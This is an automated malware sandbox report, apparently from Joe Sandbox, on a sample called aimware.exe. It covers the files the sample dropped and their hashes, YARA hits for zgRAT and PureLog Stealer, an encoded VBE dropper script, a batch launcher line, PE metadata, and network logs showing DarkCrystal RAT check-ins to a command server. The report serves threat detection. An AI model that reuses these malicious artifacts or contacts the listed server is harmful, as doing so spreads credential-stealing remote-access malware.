Preview:	.... ...........................\|...<...............0...........\|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...\.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0....................................<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">.. <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>.. <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">.. <securi

C:\Windows\System32\SecurityHealthSystray.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	4608
Entropy (8bit):	3.9762715587554514
Encrypted:	false
SSDEEP:	48:6GJTPt/yM7Jt8Bs3FJsdcV4MKe27rddSMvqBH2OulajfqXSfbNtm:hPJPPc+Vx9MrJvkQcjRzNt
MD5:	4AD6E932DE74DF8D24BF54BD99E30D63
SHA1:	9C812E3570590402E338E4B173EFF5EA92CC4194
SHA-256:	137133793453730807D4E45E25FFE666145957A2DE7E5A0B56D47488F449E257
SHA-512:	8AF2D1AA290BDBD9A00F4B1FECFF4A5561CB1A4A85535BB9334C3A49937EE78705345CBBF246368ED66B2ABF6E747F1E3D8A3DA42F90B4434D6396E041E0FE89
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....{pg.............................'... ...@....@.. ....................................@.................................t'..W....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......(!..L.............................................................(.....0..!.......r...pre..p.{....(....(....&..&......................0..........ri..p(....&..&......................0..K.......s.......}...........s....s....(....~....-........s.........~....s....(......(....*.BSJB............v4.0.30319......l.......#~..@.......#Strings....4.......#US.........#GUID...,... ...#Blob...........WU........%3................................................................

C:\webFontsession\7uhC6Mx3YQJtIYicktXEMaD7UeOIzINRTf.bat

Download File

Process:	C:\Users\user\Desktop\aimware.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	105
Entropy (8bit):	5.086173129146203
Encrypted:	false
SSDEEP:	3:6koIPWV5vBnoYPiiTAMzH2gaUKC4A2WMKovxN9dACHAn:6gPWrZnoiiiTAMb7KCbMvx5DHAn
MD5:	E450459EC78E77BF78AFA9E39F2533B5
SHA1:	1CA81A043C39D3F91F6F73246E136F7242CF6018
SHA-256:	C1318DDABCCC566F7A54E5778F472F4EA4B6D69FF4B4FDE4A6FD0533E593F541
SHA-512:	C274614B573DE6312AAA9158A7ECE2260BE231E03D0783D758C4095FA8990D85E3A477280358BAD10A929AE0CC45371AFD34719C936279A67B0F63D1AF01DE39
Malicious:	false
Preview:	%zziVaUXPBPJQJr%%VpmGbdS%..%jgDWTyruGteek%"C:\webFontsession/SurrogatesessionRuntimeBrokerDhcp.exe"%egjb%

C:\webFontsession\88f2c89e03b79d

Download File

Process:	C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe
File Type:	ASCII text, with very long lines (690), with no line terminators
Category:	dropped
Size (bytes):	690
Entropy (8bit):	5.874247914063286
Encrypted:	false
SSDEEP:	12:gLmVvy4g/TGXfSYvIp1IN+De/ykDmVGEiwS9zJi5vh1prP8ToF3Pe9mGGShxDlf:M46TANvncgykDR/wsOvbprKoNPe9DGSZ
MD5:	1CDCAE4A986380EAF9288940FF267C56
SHA1:	FE060C9BFFAEDFEB4A5D52FD13A6102CD71A871D
SHA-256:	BD82020FE8C6807691E3CC72C85324E6C2659F7D2074A3C8E6BC4E069B4429EB
SHA-512:	28C742FE726A443C832F3E93873579C16C359FFC067DC8521D2771769323723C5E11E3851EACB3134A4B3812A69B94CFE8D8BCABF56CA8767296023BFF72DDEE
Malicious:	false
Preview:	mrzR2riXKVlgV1rJUk18ntWeDto2yehI8yOvjOVLkpjdj5bnrkCHcyD3VUNJCpiqydhhm6jGOqX8J25HRAKNbZpKuVZPAMJ5G3pFX3BvB63waEtcZG1BeVOYxXxQgUGChc2QNztX9ZLfg3tpm7z4UHaupQRAGuPrz0O8McOjWeCFJs24nHoieMsZCHl7isQOJeqpoucJsQhzEUl7XXW9GrMnHz6F1QAnNx6oCNP2ofzNo3VrgnkLWRIcSChzyXRbP3lQY65KHdVl189OdPiNqzR6pdW9pZEQNX7uRETksaD25hlTCTVjyDvamol4j5fsZEXdAO7Z58eQvZAH2D7VDebJmhImcYAx4Vc1JHSyV6n0jepNneBg7Jo4mO0dFU6h8rVa6J8vvI9H1lkI2598XezvqiO5RysB9G21IORegQuzJhCAnslKV8Kd1ktX4Cd6Z8Hvts9noecGtAlJfORiNipB6YAif3jdwyZKZRR5s8f0gDu08j2qv5t1SGzVrbHv48U5lbuN6WzPDye3oKj6B3s1Ei1Sc6NR0u5hsyPhzotYFeyel5qh2LtBQd0DjbvAIiYS27Kz5BGXKTvktXrgPqZoA4QP7M8Y3sQhFflnv0m0FW16rQTLtOvcIuR8r51tDsdbDOeOwDvYEjjnDThr2woo6yYVNm6z93xW2Z3dvEZqcXXjKn

C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe

Download File

Process:	C:\Users\user\Desktop\aimware.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1922560
Entropy (8bit):	7.535542151434719
Encrypted:	false
SSDEEP:	24576:6fDcXgugMu1XHi1yxsP7S5Aj59NKBbNVu39p/Zy1xU7r7khR6+JB65hzxkxBLEV:6wXgLGzS5PgtFZyHU7khRdJg5srL
MD5:	73E7655A3D54309A3CCFB3B9CA197652
SHA1:	BB6B131E8AD43F0064C259ABC266394FE75F76DC
SHA-256:	70683DDAB7E1CB04128D4FB61BE2CD61B6A5149C429145FAF5B9F239A4FFAC21
SHA-512:	E0D0C8D34DC59DCB49E8D465A03CA13D13114EC153CFB3ECEBAD961FA260961509BBED8A90146E66A0AA0321363F0AF733C0779EE7C4121C0A1F63BAD17CCD65
Malicious:	true
Yara Hits:	Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....5pg.................N..........Nm... ........@.. ....................................@..................................m..K....... ............................................................................ ............... ..H............text...TM... ...N.................. ..`.rsrc... ............P..............@....reloc...............T..............@..B................0m......H...............................rl.......................................0..........(.... ........8........E....).......M...\...8$...(.... ....~~...{....9....& ....8....(.... ....~~...{f...9....& ....8....(.... ....8....*....0..'....... ........8........E........................9...M...8....8.... ....8.......... ....~~...{....:....& ....8....~....9.... ....8........~....(n...~....(r... ....<U... ....~~...{....9\...& ....8Q...~....(f... .... .... ....s....~....(j....... ....8.

C:\webFontsession\ygBm0L4dnhMtPJ5zo9k2Iwhn4.vbe

Download File

Process:	C:\Users\user\Desktop\aimware.exe
File Type:	data
Category:	dropped
Size (bytes):	226
Entropy (8bit):	5.85323265568274
Encrypted:	false
SSDEEP:	6:GFtkvwqK+NkLzWbHK/818nZNDd3RL1wQJRQISfeDKCbmkzMqZWI3ttu:GFFMCzWLKG4d3XBJaRmDWqZP3ttu
MD5:	E6669683AC56F848A9D55FEC8B072D1A
SHA1:	FBF6888DA912AEE18F92FE79A1EC06DD00FE6AD1
SHA-256:	F9AF725F124E18604698F97BCA12E37ED408C571F4408516CC20695B2B2CD779
SHA-512:	47E5475442A29D13449C7B8B5171CE889D80248E144B1CC56618D8778408A3DDEA968279739BAD81D505952050D179B1B9905EF1CAD35C6210A9C2DB202EBD05
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	#@~^yQAAAA==j.Y~q/4?t.V^~',Z.+mYn6(L+1O`r.?1.rwDRUtnVsE*@#@&.U^DbwO UV+n2vvT!Zb@#@&j.Y,./4?4nV^PxP;DnCD+r(%+1Y`r.jmMkaY ?4n^VE#@#@&.ktj4.VV ]!x~J;lJhn(sKxYk+kdkKx&zFE4/+H62epxYqIr^3D(AHCf{i.r(y&HI:0 8mYJS~Z~~0msk+FEAAAA==^#~@.

\Device\Null

Download File

Process:	C:\Windows\System32\w32tm.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	151
Entropy (8bit):	4.800365057084059
Encrypted:	false
SSDEEP:	3:VLV993J+miJWEoJ8FX/UWXKvoh6HKvj:Vx993DEUr6Qs
MD5:	947C3A40F0A1BDA1369096C0032167FD
SHA1:	55DF6C2FD61F39000E881ECCF924844BFCF8B20A
SHA-256:	2F02260A89E491EC2601ED2294A827C03B649272E24B8655A0458034F323313A
SHA-512:	E9FD3D8CEF8D352E6AB9DDC4FDC556AA07E789BE156169D49630131F3DD42ADACD48F213BE63736AF9AB5174154E53283584E1EFB2B25EFBC60720D8FFE3E4F1
Malicious:	false
Preview:	Tracking localhost [[::1]:123]..Collecting 2 samples..The current time is 28/12/2024 17:30:10..17:30:10, error: 0x80072746.17:30:15, error: 0x80072746.

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.479841254179053
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 50.01% Win32 Executable (generic) a (10002005/4) 49.97% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	aimware.exe
File size:	2'210'583 bytes
MD5:	09b7a6fd3683f653ea233a547c082671
SHA1:	07f919d59982c0670ea31d1f1f63b08f31eff676
SHA256:	869f0e3329384069c1fad576588672e99686bd57eee2213f90f0c78ece45d7ca
SHA512:	e09c6550e61edbb3e3bb6b24ab3bc97cef58bd1fc850c8c820942d6f98bdb620839d133f1723c57c4b78a0592965c77391cfca87205900384b5f86aaeb36c90c
SSDEEP:	24576:dTbBv5rU+jFfDcXgugMu1XHi1yxsP7S5Aj59NKBbNVu39p/Zy1xU7r7khR6+JB6A:3BfFwXgLGzS5PgtFZyHU7khRdJg5srLF
TLSH:	8FA5B01675934E32C3B017364777123D52A1EBA23A11EF5F364F2092A917BF18B762A3
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x_c.<>..<>..<>......1>.......>......$>...I..>>...I../>...I..+>...I...>..5F..7>..5F..;>..<>..)?...I...>...I..=>...I..=>...I..=>.

File Icon


Icon Hash:	b06968eccccc71ab

Static PE Info

General

Entrypoint:	0x41f530
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Time Stamp:	0x6220BF8D [Thu Mar 3 13:15:57 2022 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	12e12319f1029ec4f8fcbed7e82df162

Entrypoint Preview

Instruction
call 00007FA96CD7C1ABh
jmp 00007FA96CD7BABDh
int3
int3
int3
int3
int3
int3
push ebp
mov ebp, esp
push esi
push dword ptr [ebp+08h]
mov esi, ecx
call 00007FA96CD6E907h
mov dword ptr [esi], 004356D0h
mov eax, esi
pop esi
pop ebp
retn 0004h
and dword ptr [ecx+04h], 00000000h
mov eax, ecx
and dword ptr [ecx+08h], 00000000h
mov dword ptr [ecx+04h], 004356D8h
mov dword ptr [ecx], 004356D0h
ret
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
push ebp
mov ebp, esp
push esi
mov esi, ecx
lea eax, dword ptr [esi+04h]
mov dword ptr [esi], 004356B8h
push eax
call 00007FA96CD7EF4Fh
test byte ptr [ebp+08h], 00000001h
pop ecx
je 00007FA96CD7BC4Ch
push 0000000Ch
push esi
call 00007FA96CD7B209h
pop ecx
pop ecx
mov eax, esi
pop esi
pop ebp
retn 0004h
push ebp
mov ebp, esp
sub esp, 0Ch
lea ecx, dword ptr [ebp-0Ch]
call 00007FA96CD6E882h
push 0043BEF0h
lea eax, dword ptr [ebp-0Ch]
push eax
call 00007FA96CD7EA09h
int3
push ebp
mov ebp, esp
sub esp, 0Ch
lea ecx, dword ptr [ebp-0Ch]
call 00007FA96CD7BBC8h
push 0043C0F4h
lea eax, dword ptr [ebp-0Ch]
push eax
call 00007FA96CD7E9ECh
int3
jmp 00007FA96CD80487h
int3
int3
int3
int3
push 00422900h
push dword ptr fs:[00000000h]

Rich Headers

Programming Language:

[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x3d070	0x34	.rdata
IMAGE_DIRECTORY_ENTRY_IMPORT	0x3d0a4	0x50	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x64000	0x5a0c	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x6a000	0x233c	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x3b11c	0x54	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x355f8	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x33000	0x278	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x3c5ec	0x120	.rdata
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x31bdc	0x31c00	2831bb8b11e3209658a53131886cdf98	False	0.5909380888819096	data	6.712962136932442	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x33000	0xaec0	0xb000	042f11346230ca5aa360727d9908e809	False	0.4579190340909091	data	5.261605615899847	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x3e000	0x24720	0x1000	9670b581969e508258d8bc903025de5e	False	0.451416015625	data	4.387459135575936	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.didat	0x63000	0x190	0x200	c83554035c63bb446c6208d0c8fa0256	False	0.4453125	data	3.3327310103022305	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x64000	0x5a0c	0x5c00	8c8c3105d67348bcf86fb727bd357a54	False	0.5446671195652174	data	5.985771383229392	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x6a000	0x233c	0x2400	40b5e17755fd6fdd34de06e5cdb7f711	False	0.7749565972222222	data	6.623012966548067	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
PNG	0x64524	0xb45	PNG image data, 93 x 302, 8-bit/color RGB, non-interlaced	English	United States	1.0027729636048528
PNG	0x6506c	0x15a9	PNG image data, 186 x 604, 8-bit/color RGB, non-interlaced	English	United States	0.9363390441839495
RT_ICON	0x66618	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2835 x 2835 px/m			0.2401500938086304
RT_DIALOG	0x676c0	0x286	data	English	United States	0.5092879256965944
RT_DIALOG	0x67948	0x13a	data	English	United States	0.60828025477707
RT_DIALOG	0x67a84	0xec	data	English	United States	0.6991525423728814
RT_DIALOG	0x67b70	0x12e	data	English	United States	0.5927152317880795
RT_DIALOG	0x67ca0	0x338	data	English	United States	0.45145631067961167
RT_DIALOG	0x67fd8	0x252	data	English	United States	0.5757575757575758
RT_STRING	0x6822c	0x1e2	data	English	United States	0.3900414937759336
RT_STRING	0x68410	0x1cc	data	English	United States	0.4282608695652174
RT_STRING	0x685dc	0x1b8	data	English	United States	0.45681818181818185
RT_STRING	0x68794	0x146	data	English	United States	0.5153374233128835
RT_STRING	0x688dc	0x46c	data	English	United States	0.3454063604240283
RT_STRING	0x68d48	0x166	data	English	United States	0.49162011173184356
RT_STRING	0x68eb0	0x152	data	English	United States	0.5059171597633136
RT_STRING	0x69004	0x10a	data	English	United States	0.49624060150375937
RT_STRING	0x69110	0xbc	data	English	United States	0.6329787234042553
RT_STRING	0x691cc	0xd6	data	English	United States	0.5747663551401869
RT_GROUP_ICON	0x692a4	0x14	data			1.1
RT_MANIFEST	0x692b8	0x753	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.3957333333333333

Imports

DLL	Import
KERNEL32.dll	GetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, CreateDirectoryW, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, InterlockedDecrement, GetVersionExW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleFileNameW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, GetCurrentProcessId, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, SetCurrentDirectoryW, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetTimeFormatW, GetDateFormatW, GetNumberFormatW, DecodePointer, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineA, GetOEMCP, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, TerminateProcess, LocalFree, RtlUnwind, EncodePointer, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, HeapReAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage
OLEAUT32.dll	SysAllocString, SysFreeString, VariantClear
gdiplus.dll	GdipAlloc, GdipDisposeImage, GdipCloneImage, GdipCreateBitmapFromStream, GdipCreateBitmapFromStreamICM, GdipCreateHBITMAPFromBitmap, GdiplusStartup, GdiplusShutdown, GdipFree

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-28T22:18:29.047322+0100	2048095	ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)	1	192.168.2.4	49731	172.67.132.55	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 28, 2024 22:18:27.675174952 CET	49731	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:18:27.794718027 CET	80	49731	172.67.132.55	192.168.2.4
Dec 28, 2024 22:18:27.794809103 CET	49731	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:18:27.795274019 CET	49731	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:18:27.914706945 CET	80	49731	172.67.132.55	192.168.2.4
Dec 28, 2024 22:18:28.142039061 CET	49731	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:18:28.261684895 CET	80	49731	172.67.132.55	192.168.2.4
Dec 28, 2024 22:18:28.948762894 CET	80	49731	172.67.132.55	192.168.2.4
Dec 28, 2024 22:18:29.047322035 CET	49731	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:18:29.206145048 CET	80	49731	172.67.132.55	192.168.2.4
Dec 28, 2024 22:18:29.206253052 CET	80	49731	172.67.132.55	192.168.2.4
Dec 28, 2024 22:18:29.206307888 CET	49731	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:18:29.426733971 CET	49731	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:18:29.546673059 CET	80	49731	172.67.132.55	192.168.2.4
Dec 28, 2024 22:18:29.780517101 CET	80	49731	172.67.132.55	192.168.2.4
Dec 28, 2024 22:18:29.780740023 CET	49731	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:18:29.900331974 CET	80	49731	172.67.132.55	192.168.2.4
Dec 28, 2024 22:18:30.251072884 CET	80	49731	172.67.132.55	192.168.2.4
Dec 28, 2024 22:18:30.359903097 CET	49731	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:18:30.462980032 CET	49731	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:18:30.465378046 CET	49733	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:18:30.475697041 CET	49734	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:18:30.582885027 CET	80	49731	172.67.132.55	192.168.2.4
Dec 28, 2024 22:18:30.582961082 CET	49731	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:18:30.584836960 CET	80	49733	172.67.132.55	192.168.2.4
Dec 28, 2024 22:18:30.584939003 CET	49733	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:18:30.585714102 CET	49733	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:18:30.595238924 CET	80	49734	172.67.132.55	192.168.2.4
Dec 28, 2024 22:18:30.595338106 CET	49734	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:18:30.595922947 CET	49734	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:18:30.705240965 CET	80	49733	172.67.132.55	192.168.2.4
Dec 28, 2024 22:18:30.716248989 CET	80	49734	172.67.132.55	192.168.2.4
Dec 28, 2024 22:18:30.965277910 CET	49733	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:18:30.965641022 CET	49734	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:18:31.084853888 CET	80	49733	172.67.132.55	192.168.2.4
Dec 28, 2024 22:18:31.084913015 CET	80	49733	172.67.132.55	192.168.2.4
Dec 28, 2024 22:18:31.085108042 CET	80	49734	172.67.132.55	192.168.2.4
Dec 28, 2024 22:18:31.680439949 CET	80	49734	172.67.132.55	192.168.2.4
Dec 28, 2024 22:18:31.762059927 CET	80	49733	172.67.132.55	192.168.2.4
Dec 28, 2024 22:18:31.859812021 CET	49734	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:18:31.859886885 CET	49733	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:18:31.922749043 CET	80	49734	172.67.132.55	192.168.2.4
Dec 28, 2024 22:18:32.014098883 CET	80	49733	172.67.132.55	192.168.2.4
Dec 28, 2024 22:18:32.020876884 CET	49733	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:18:32.047398090 CET	49734	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:18:32.067276955 CET	49734	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:18:32.069591045 CET	49739	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:18:32.140778065 CET	80	49733	172.67.132.55	192.168.2.4
Dec 28, 2024 22:18:32.140826941 CET	49733	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:18:32.187144995 CET	80	49734	172.67.132.55	192.168.2.4
Dec 28, 2024 22:18:32.187227964 CET	49734	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:18:32.189105034 CET	80	49739	172.67.132.55	192.168.2.4
Dec 28, 2024 22:18:32.189208031 CET	49739	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:18:32.189368963 CET	49739	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:18:32.308779955 CET	80	49739	172.67.132.55	192.168.2.4
Dec 28, 2024 22:18:32.547472000 CET	49739	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:18:32.680139065 CET	80	49739	172.67.132.55	192.168.2.4
Dec 28, 2024 22:18:33.365859985 CET	80	49739	172.67.132.55	192.168.2.4
Dec 28, 2024 22:18:33.547306061 CET	49739	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:18:33.618155003 CET	80	49739	172.67.132.55	192.168.2.4
Dec 28, 2024 22:18:33.827816010 CET	49742	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:18:33.859824896 CET	49739	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:18:33.947479963 CET	80	49742	172.67.132.55	192.168.2.4
Dec 28, 2024 22:18:33.947571993 CET	49742	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:18:33.947928905 CET	49742	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:18:33.980621099 CET	49739	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:18:34.067895889 CET	80	49742	172.67.132.55	192.168.2.4
Dec 28, 2024 22:18:34.425534010 CET	49742	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:18:34.545139074 CET	80	49742	172.67.132.55	192.168.2.4
Dec 28, 2024 22:18:34.881503105 CET	49743	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:18:34.883172989 CET	49742	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:18:35.001122952 CET	80	49743	172.67.132.55	192.168.2.4
Dec 28, 2024 22:18:35.001246929 CET	49743	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:18:35.001597881 CET	49743	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:18:35.003019094 CET	80	49742	172.67.132.55	192.168.2.4
Dec 28, 2024 22:18:35.003107071 CET	49742	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:18:35.121023893 CET	80	49743	172.67.132.55	192.168.2.4
Dec 28, 2024 22:18:35.278577089 CET	49744	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:18:35.360002995 CET	49743	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:18:35.398092031 CET	80	49744	172.67.132.55	192.168.2.4
Dec 28, 2024 22:18:35.398158073 CET	49744	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:18:35.398268938 CET	49744	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:18:35.479573011 CET	80	49743	172.67.132.55	192.168.2.4
Dec 28, 2024 22:18:35.479629040 CET	49743	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:18:35.479630947 CET	80	49743	172.67.132.55	192.168.2.4
Dec 28, 2024 22:18:35.479671955 CET	80	49743	172.67.132.55	192.168.2.4
Dec 28, 2024 22:18:35.479672909 CET	49743	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:18:35.479715109 CET	49743	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:18:35.479757071 CET	80	49743	172.67.132.55	192.168.2.4
Dec 28, 2024 22:18:35.479767084 CET	80	49743	172.67.132.55	192.168.2.4
Dec 28, 2024 22:18:35.479799986 CET	80	49743	172.67.132.55	192.168.2.4
